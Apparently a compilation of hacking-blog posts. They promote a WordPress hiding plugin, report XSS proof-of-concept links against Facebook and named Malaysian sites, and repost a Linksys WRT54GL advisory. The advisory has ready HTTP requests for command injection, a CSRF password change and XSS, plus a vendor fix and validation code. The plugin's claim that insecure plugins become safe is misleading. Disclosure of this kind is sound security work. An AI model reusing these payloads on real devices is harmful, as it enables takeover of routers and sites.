
Hide My WP! 95% safe from SQL injection and XSS attacks.


Assalamualaikum and greetings.
WordPress is one of the most popular platforms today. It is used very widely: some people use WordPress as a blog, while others use it as the base for an official or personal website.

In practice, many users want to hide the fact that they use WordPress, because there are various bugs in WordPress plugins and themes. We may not have the time to check or update plugins every day to make sure the site always stays secure.


You can now try the Hide My WP plugin as one way to improve the security of your WordPress system. Recently we have seen large-scale attacks by hackers, and most of the sites that were hacked run on WordPress. among the most aggressive botnets ever seen

Improve your security
Hide My WP controls WP access to PHP files. It protects your website 95% against SQL injection and XSS attacks. This means you can install insecure plugins without worrying about security, especially against the threat of hackers, spam and robots that constantly attack WordPress users.


XSS Vulnerability on the Facebook Login Page

Assalamualaikum and greetings.
Latest: Mauritania Attacker, a member of the hacker group Anonghost, has found an XSS vulnerability on Facebook.com.

What is XSS?
Cross Site Scripting, or XSS, is an attack method that sends malicious code injected into a website's URL so that it appears to come from a source whose integrity can be trusted. In this way, an attacker can obtain the target's confidential or personal information and can also launch malicious applications.

Below is a screenshot showing some code that was successfully injected into the Facebook.com URL:


PoC link: https://www.facebook.com/r.php?locale=en_us&possible_fb_user=+display=&email=HACKED%20BY%20MAURITANIA%20ATTACKER%20see%20more%20news%20on%20www.gilerhackers.com


Before this, Mauritania Attacker had also found several bugs on the Facebook site; most of these vulnerabilities have still not been fixed.

Marshable.net Exposed to an XSS Vulnerability

Assalamualaikum and greetings.
Recently, owners of social networks that use the PHPFoX script for their sites were told that they are most likely exposed to XSS injection (according to the exploit).

What is XSS?
Cross Site Scripting, or XSS for short, is an attack method that sends malicious code injected into a website's URL so that it appears to come from a source whose integrity can be trusted. In this way, an attacker can obtain the target's confidential or personal information and can also launch malicious applications.

In other words, it is an attack method that uses JavaScript written to exploit a vulnerability in a website. (via: OMG hackers)

Several Malaysian social network sites such as Marshable.net, Myheppi.com and Youkawan.com are affected by this type of attack.

Below is a screenshot after XSS code was injected into their URLs:


Live Demo:
www.Marshable.net/XSS-demo
www.myHeppi.com/XSS-demo
www.youKAWAN.com/XSS-demo


[GH Exploit] Linksys WRT54GL 1.1 XSS / OS Command Injection


Device Name: Linksys WRT54GL v1.1
Vendor: Linksys/Cisco
============ Vulnerable Firmware Releases: ============
Firmware Version: 4.30.15 build 2, 01/20/2011

============ Device Description: ============
The Router lets you access the Internet via a wireless connection, broadcast at up to 54 Mbps, or through one of its four switched ports. You can also use the Router to share resources such as computers, printers and files. A variety of security features help to protect your data and your privacy while online. Security features include WPA2 security, a Stateful Packet Inspection (SPI) firewall and NAT technology. Configuring the Router is easy using the provided browser-based utility.
Source: http://homesupport.cisco.com/en-us/support/routers/WRT54GL
============ Shodan Torks ============
Shodan Search: WRT54GL
= Results 27190 devices
============ Vulnerability Overview: ============
* OS Command Injection
= parameter: wan_hostname
= command: `%20ping%20192%2e168%2e178%2e101%20`
The vulnerability is caused by missing input validation in the wan_hostname parameter and can be exploited to inject and execute arbitrary shell commands. With wget it is possible to upload and execute a backdoor to compromise the device.
You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/OS-Command-Injection-param_wan_hostname.png
POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/index.asp
Authorization: Basic xxxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 734
Connection: close
submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1
= Changing the request method from HTTP POST to HTTP GET makes the exploitation easier:
http://192.168.178.166/apply.cgi?submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=test&wan_hostname=`%20ping%20192%2e168%2e178%2e101%20`&wan_domain=test&mtu_enable=1&wan_mtu=1500&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=166&lan_netmask=255.255.255.0&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1
= This setting is placed permanently into the configuration and so it gets executed on every bootup process of the device.
* When changing the current password, there is no request for the current password
With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.
POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/Management.asp
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-Length: 299
submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=pwnd&http_passwdConfirm=pwnd&_http_enable=1&web_wl_filter=0&remote_management=1&http_wanport=8080&upnp_enable=1&upnp_config=1&upnp_internet_dis=0
* CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management:
http://IP/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=pwnd1&http_passwdConfirm=pwnd1&_http_enable=1&web_wl_filter=0&remote_management=1&http_wanport=8080&upnp_enable=1&upnp_config=1&upnp_internet_dis=0
* reflected XSS
= parameter: submit_button
Injecting scripts into the parameter submit_button reveals that this parameter is not properly validated for malicious input.
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/reflected-XSS-01.png
POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/Wireless_Basic.asp
Authorization: Basic xxxx=
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
submit_button=Wireless_Basic'%3balert('pwnd')//&action=Apply&submit_type=&change_action=&next_page=&wl_net_mode=mixed&wl_ssid=test&wl_channel=6&wl_closed=0
* stored XSS (Access Restrictions - Enter Policy Name (place the XSS) - Summary (script code gets executed))
= parameter: f_name
Injecting scripts into the parameter f_name reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods like CSRF for inserting the malicious JavaScript code.
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/stored-XSS-Filters.png
= Changing the request method from HTTP POST to HTTP GET makes the exploitation easier:
http://192.168.178.166/apply.cgi?submit_button=Filters&change_action=&submit_type=save&action=Apply&blocked_service=&filter_web=&filter_policy=&f_status=0&f_id=1&f_status1=disable&f_name=123"img%20src%3d"0"%20onerror%3dalert("XSSed1")&f_status2=allow&day_all=1&time_all=1&allday=&blocked_service0=None&blocked_service1=None&host0=&host1=&host2=&host3=&url0=&url1=&url2=&url3=&url4=&url5=
============ Solution ============
Upgrade your router to the latest firmware version with fixes for XSS and OS Command Injection vulnerabilities.
Fixed Version: Ver.4.30.16 (Build 2)
Available since 10.01.2013
Download: http://homesupport.cisco.com/en-eu/support/routers/WRT54GL
============ Credits ============
The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-001
Twitter: @s3cur1ty_de
============ Time Line: ============
September 2012 - discovered vulnerability
03.10.2012 - Contacted Linksys and gave them detailed vulnerability details
03.10.2012 - Linksys responded with a case number
11.10.2012 - Status update from Linksys
23.10.2012 - Linksys requested to sign the Beta Agreement for testing the Beta Firmware
29.10.2012 - Sent the Beta Agreement back
29.10.2012 - Linksys gives access to the new Beta Firmware
30.10.2012 - Checked the new firmware and verified that the discovered XSS and OS Command Injection vulnerabilities are fixed
30.10.2012 - Linksys responded that there is no ETA of the new firmware
17.01.2013 - Linksys informed me about the public release of a mostly fixed version (XSS, OS Command Injection fixed)
18.01.2013 - public release
===================== Advisory end =====================
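
An added example, not part of the advisory and not Linksys firmware code: one way an apply.cgi-style handler could allow-list the wan_hostname and submit_button parameters named above before they reach a shell command or a generated page. The function names are hypothetical, and the inputs in main() are the advisory's payloads in URL-decoded form.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

static int is_alnum_ascii(unsigned char c) {
    return (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9');
}

/* wan_hostname: accept only RFC 1123 hostnames (letters, digits, '-', '.'),
 * so backticks, spaces, ';', '|' and '$' never reach a shell command line. */
int valid_hostname(const char *s) {
    size_t len = strlen(s), label = 0;
    if (len == 0 || len > 253) return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (c == '.') {
            if (label == 0 || s[i - 1] == '-') return 0; /* empty label or label ending in '-' */
            label = 0;
        } else if (!(is_alnum_ascii(c) || (c == '-' && label > 0)) || ++label > 63) {
            return 0; /* illegal character, leading '-', or label longer than 63 */
        }
    }
    return label > 0 && s[len - 1] != '-';
}

/* submit_button is echoed into a JavaScript string, where HTML escaping alone
 * is not enough; accept only a page identifier of [A-Za-z0-9_], 1..32 chars. */
int valid_page_name(const char *s) {
    size_t n = strlen(s);
    if (n == 0 || n > 32) return 0;
    for (size_t i = 0; i < n; i++)
        if (!is_alnum_ascii((unsigned char)s[i]) && s[i] != '_') return 0;
    return 1;
}

int main(void) {
    /* Validation runs on the URL-decoded value, after the CGI layer has decoded it. */
    printf("hostname test: %d\n", valid_hostname("test"));
    printf("hostname payload: %d\n", valid_hostname("` ping 192.168.178.101 `"));
    printf("page Wireless_Basic: %d\n", valid_page_name("Wireless_Basic"));
    printf("page payload: %d\n", valid_page_name("Wireless_Basic';alert('pwnd')//"));
    return 0;
}
```

Free-text fields such as f_name cannot be allow-listed this tightly and need output encoding for the HTML context in which they are displayed.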
 
